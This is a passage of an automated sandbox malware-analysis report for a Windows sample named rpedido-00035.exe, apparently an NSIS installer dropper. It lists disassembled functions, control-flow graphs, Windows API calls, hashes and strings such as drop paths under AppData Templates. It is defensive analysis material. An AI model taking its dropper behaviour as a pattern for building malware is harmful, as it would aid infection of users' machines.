                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-137538357
                                                          • Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                          • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                          • Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                          • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE
                                                          Function 00406ABA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 842 406aba-406abf 843 406b30-406b4e 842->843 844 406ac1-406af0 842->844 845 407126-40713b 843->845 846 406af2-406af5 844->846 847 406af7-406afb 844->847 848 407155-40716b 845->848 849 40713d-407153 845->849 850 406b07-406b0a 846->850 851 406b03 847->851 852 406afd-406b01 847->852 855 40716e-407175 848->855 849->855 853 406b28-406b2b 850->853 854 406b0c-406b15 850->854 851->850 852->850 858 406cfd-406d1b 853->858 856 406b17 854->856 857 406b1a-406b26 854->857 859 407177-40717b 855->859 860 40719c-4071a8 855->860 856->857 862 406b90-406bbe 857->862 865 406d33-406d45 858->865 866 406d1d-406d31 858->866 863 407181-407199 859->863 864 40732a-407334 859->864 869 40693e-406947 860->869 870 406bc0-406bd8 862->870 871 406bda-406bf4 862->871 863->860 867 407340-407353 864->867 868 406d48-406d52 865->868 866->868 877 407358-40735c 867->877 872 406d54 868->872 873 406cf5-406cfb 868->873 874 407355 869->874 875 40694d 869->875 876 406bf7-406c01 870->876 871->876 878 406cd0-406cd4 872->878 879 406e65-406e72 872->879 873->858 880 406c99-406ca3 873->880 874->877 881 406954-406958 875->881 882 406a94-406ab5 875->882 883 4069f9-4069fd 875->883 884 406a69-406a6d 875->884 885 406c07 876->885 886 406b78-406b7e 876->886 897 406cda-406cf2 878->897 898 4072dc-4072e6 878->898 879->869 890 406ec1-406ed0 879->890 893 4072e8-4072f2 880->893 894 406ca9-406ccb 880->894 881->867 899 40695e-40696b 881->899 882->845 891 406a03-406a1c 883->891 892 4072a9-4072b3 883->892 888 406a73-406a87 884->888 889 4072b8-4072c2 884->889 901 4072c4-4072ce 885->901 902 406b5d-406b75 885->902 895 406c31-406c37 886->895 896 406b84-406b8a 886->896 900 406a8a-406a92 888->900 889->867 890->845 906 406a1f-406a23 891->906 892->867 893->867 894->879 903 406c95 895->903 905 406c39-406c57 895->905 896->862 896->903 897->873 898->867 899->874 904 406971-4069b7 899->904 900->882 900->884 901->867 902->886 903->880 907 4069b9-4069bd 904->907 908 4069df-4069e1 904->908 909 406c59-406c6d 905->909 910 406c6f-406c81 905->910 906->883 911 406a25-406a2b 906->911 912 4069c8-4069d6 GlobalAlloc 907->912 913 4069bf-4069c2 GlobalFree 907->913 915 4069e3-4069ed 908->915 916 4069ef-4069f7 908->916 914 406c84-406c8e 909->914 910->914 917 406a55-406a67 911->917 918 406a2d-406a34 911->918 912->874 919 4069dc 912->919 913->912 914->895 920 406c90 914->920 915->915 915->916 916->906 917->900 921 406a36-406a39 GlobalFree 918->921 922 406a3f-406a4f GlobalAlloc 918->922 919->908 924 4072d0-4072da 920->924 925 406c16-406c2e 920->925 921->922 922->874 922->917 924->867 925->895
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                          • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                          • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                          • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                          Function 004066F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0), ref: 004066FE
                                                          • FindClose.KERNELBASE(00000000), ref: 0040670A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: xgB
                                                          • API String ID: 2295610775-399326502
                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8
                                                          Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                          • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                          • Opcode Fuzzy Hash: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                          • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D
                                                          Function 00403ABE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 139 403abe-403ad6 call 40678a 142 403ad8-403ae8 call 4062f7 139->142 143 403aea-403b21 call 40627e 139->143 151 403b44-403b6d call 403d94 call 405d89 142->151 147 403b23-403b34 call 40627e 143->147 148 403b39-403b3f lstrcatW 143->148 147->148 148->151 157 403b73-403b78 151->157 158 403bff-403c07 call 405d89 151->158 157->158 159 403b7e-403ba6 call 40627e 157->159 163 403c15-403c3a LoadImageW 158->163 164 403c09-403c10 call 4063d2 158->164 159->158 169 403ba8-403bac 159->169 167 403cbb-403cc3 call 40140b 163->167 168 403c3c-403c6c RegisterClassW 163->168 164->163 182 403cc5-403cc8 167->182 183 403ccd-403cd8 call 403d94 167->183 172 403c72-403cb6 SystemParametersInfoW CreateWindowExW 168->172 173 403d8a 168->173 170 403bbe-403bca lstrlenW 169->170 171 403bae-403bbb call 405cae 169->171 177 403bf2-403bfa call 405c81 call 4063b0 170->177 178 403bcc-403bda lstrcmpiW 170->178 171->170 172->167 176 403d8c-403d93 173->176 177->158 178->177 181 403bdc-403be6 GetFileAttributesW 178->181 185 403be8-403bea 181->185 186 403bec-403bed call 405ccd 181->186 182->176 192 403d61-403d69 call 4054e7 183->192 193 403cde-403cf8 ShowWindow call 40671a 183->193 185->177 185->186 186->177 198 403d83-403d85 call 40140b 192->198 199 403d6b-403d71 192->199 200 403d04-403d16 GetClassInfoW 193->200 201 403cfa-403cff call 40671a 193->201 198->173 199->182 206 403d77-403d7e call 40140b 199->206 204 403d18-403d28 GetClassInfoW RegisterClassW 200->204 205 403d2e-403d5f DialogBoxParamW call 40140b call 403a0e 200->205 201->200 204->205 205->176 206->182
                                                          APIs
                                                            • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                            • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                          • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76B73420,"C:\Users\user\Desktop\rpedido-00035.exe",00000000), ref: 00403B3F
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
                                                          • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet), ref: 00403C26
                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                          • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                          • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                          • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-937314575
                                                          • Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                          • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                          • Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                          • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D
                                                          Function 00402F14 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 213 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 216 402f64-402f69 213->216 217 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 213->217 218 4031b3-4031b7 216->218 225 402fa2-402fb9 217->225 226 40308c-40309a call 402e72 217->226 228 402fbb 225->228 229 402fbd-402fca call 40342b 225->229 233 4030a0-4030a3 226->233 234 40316b-403170 226->234 228->229 235 402fd0-402fd6 229->235 236 403127-40312f call 402e72 229->236 237 4030a5-4030bd call 403441 call 40342b 233->237 238 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 233->238 234->218 239 403056-40305a 235->239 240 402fd8-402ff0 call 405e5d 235->240 236->234 237->234 261 4030c3-4030c9 237->261 264 403131-403161 call 403441 call 4031ba 238->264 265 40311d-403122 238->265 244 403063-403069 239->244 245 40305c-403062 call 402e72 239->245 240->244 259 402ff2-402ff9 240->259 251 40306b-403079 call 40687d 244->251 252 40307c-403086 244->252 245->244 251->252 252->225 252->226 259->244 263 402ffb-403002 259->263 261->234 261->238 263->244 266 403004-40300b 263->266 273 403166-403169 264->273 265->218 266->244 268 40300d-403014 266->268 268->244 270 403016-403036 268->270 270->234 272 40303c-403040 270->272 275 403042-403046 272->275 276 403048-403050 272->276 273->234 274 403172-403183 273->274 277 403185 274->277 278 40318b-403190 274->278 275->226 275->276 276->244 279 403052-403054 276->279 277->278 280 403191-403197 278->280 279->244 280->280 281 403199-4031b1 call 405e5d 280->281 281->218
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402F28
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rpedido-00035.exe,00000400), ref: 00402F44
                                                            • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405EA6
                                                            • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rpedido-00035.exe,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00402F8D
                                                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rpedido-00035.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-1783131074
                                                          • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                          • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                          • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                          • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD
                                                          Function 004063D2 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 548 4063d2-4063dd 549 4063f0-406406 548->549 550 4063df-4063ee 548->550 551 40640c-406419 549->551 552 40661e-406624 549->552 550->549 551->552 555 40641f-406426 551->555 553 40662a-406635 552->553 554 40642b-406438 552->554 557 406640-406641 553->557 558 406637-40663b call 4063b0 553->558 554->553 556 40643e-40644a 554->556 555->552 559 406450-40648e 556->559 560 40660b 556->560 558->557 562 406494-40649f 559->562 563 4065ae-4065b2 559->563 564 406619-40661c 560->564 565 40660d-406617 560->565 566 4064a1-4064a6 562->566 567 4064b8 562->567 568 4065b4-4065ba 563->568 569 4065e5-4065e9 563->569 564->552 565->552 566->567 572 4064a8-4064ab 566->572 575 4064bf-4064c6 567->575 573 4065ca-4065d6 call 4063b0 568->573 574 4065bc-4065c8 call 4062f7 568->574 570 4065f8-406609 lstrlenW 569->570 571 4065eb-4065f3 call 4063d2 569->571 570->552 571->570 572->567 577 4064ad-4064b0 572->577 586 4065db-4065e1 573->586 574->586 579 4064c8-4064ca 575->579 580 4064cb-4064cd 575->580 577->567 582 4064b2-4064b6 577->582 579->580 584 406508-40650b 580->584 585 4064cf-4064f6 call 40627e 580->585 582->575 587 40651b-40651e 584->587 588 40650d-406519 GetSystemDirectoryW 584->588 599 406596-406599 585->599 600 4064fc-406503 call 4063d2 585->600 586->570 590 4065e3 586->590 592 406520-40652e GetWindowsDirectoryW 587->592 593 406589-40658b 587->593 591 40658d-406591 588->591 595 4065a6-4065ac call 406644 590->595 591->595 596 406593 591->596 592->593 593->591 598 406530-40653a 593->598 595->570 596->599 604 406554-40656a SHGetSpecialFolderLocation 598->604 605 40653c-40653f 598->605 599->595 602 40659b-4065a1 lstrcatW 599->602 600->591 602->595 608 406585 604->608 609 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 604->609 605->604 607 406541-406548 605->607 610 406550-406552 607->610 608->593 609->591 609->608 610->591 610->604
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
                                                          • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-1230650788
                                                          • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                          • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                          • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                          • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D
                                                          Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 611 40176f-401794 call 402c37 call 405cf8 616 401796-40179c call 4063b0 611->616 617 40179e-4017b0 call 4063b0 call 405c81 lstrcatW 611->617 622 4017b5-4017b6 call 406644 616->622 617->622 626 4017bb-4017bf 622->626 627 4017c1-4017cb call 4066f3 626->627 628 4017f2-4017f5 626->628 636 4017dd-4017ef 627->636 637 4017cd-4017db CompareFileTime 627->637 630 4017f7-4017f8 call 405e7d 628->630 631 4017fd-401819 call 405ea2 628->631 630->631 638 40181b-40181e 631->638 639 40188d-4018b6 call 405414 call 4031ba 631->639 636->628 637->636 640 401820-40185e call 4063b0 * 2 call 4063d2 call 4063b0 call 405a12 638->640 641 40186f-401879 call 405414 638->641 653 4018b8-4018bc 639->653 654 4018be-4018ca SetFileTime 639->654 640->626 673 401864-401865 640->673 651 401882-401888 641->651 655 402ac8 651->655 653->654 657 4018d0-4018db CloseHandle 653->657 654->657 661 402aca-402ace 655->661 658 4018e1-4018e4 657->658 659 402abf-402ac2 657->659 662 4018e6-4018f7 call 4063d2 lstrcatW 658->662 663 4018f9-4018fc call 4063d2 658->663 659->655 669 401901-4022f6 call 405a12 662->669 663->669 669->661 673->651 675 401867-401868 673->675 675->641
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins,?,?,00000031), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
